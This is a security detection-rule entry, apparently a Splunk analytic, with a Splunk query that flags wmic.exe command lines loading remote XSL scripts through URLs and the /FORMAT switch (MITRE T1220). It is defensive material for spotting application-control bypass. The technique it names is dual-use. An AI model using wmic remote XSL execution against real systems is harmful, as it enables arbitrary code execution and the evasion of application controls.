Techniques
Sample rules
WMIC XSL Execution via URL
- source: splunk
- technicques:
- T1220
Description
The following analytic detects wmic.exe
loading a remote XSL script
via a URL. This detection leverages Endpoint Detection and Response (EDR) data,
focusing on command-line executions that include HTTP/HTTPS URLs and the /FORMAT
switch. This activity is significant as it indicates a potential application control
bypass, allowing adversaries to execute JScript or VBScript within an XSL file.
If confirmed malicious, this technique can enable attackers to execute arbitrary
code, escalate privileges, or maintain persistence using a trusted Windows tool,
posing a severe threat to the environment.
Detection logic
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where
`process_wmic`
Processes.process IN ("*http://*", "*https://*")
Processes.process="*/format:*"
by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
Processes.parent_process_name Processes.parent_process_path Processes.process
Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id
Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `wmic_xsl_execution_via_url_filter`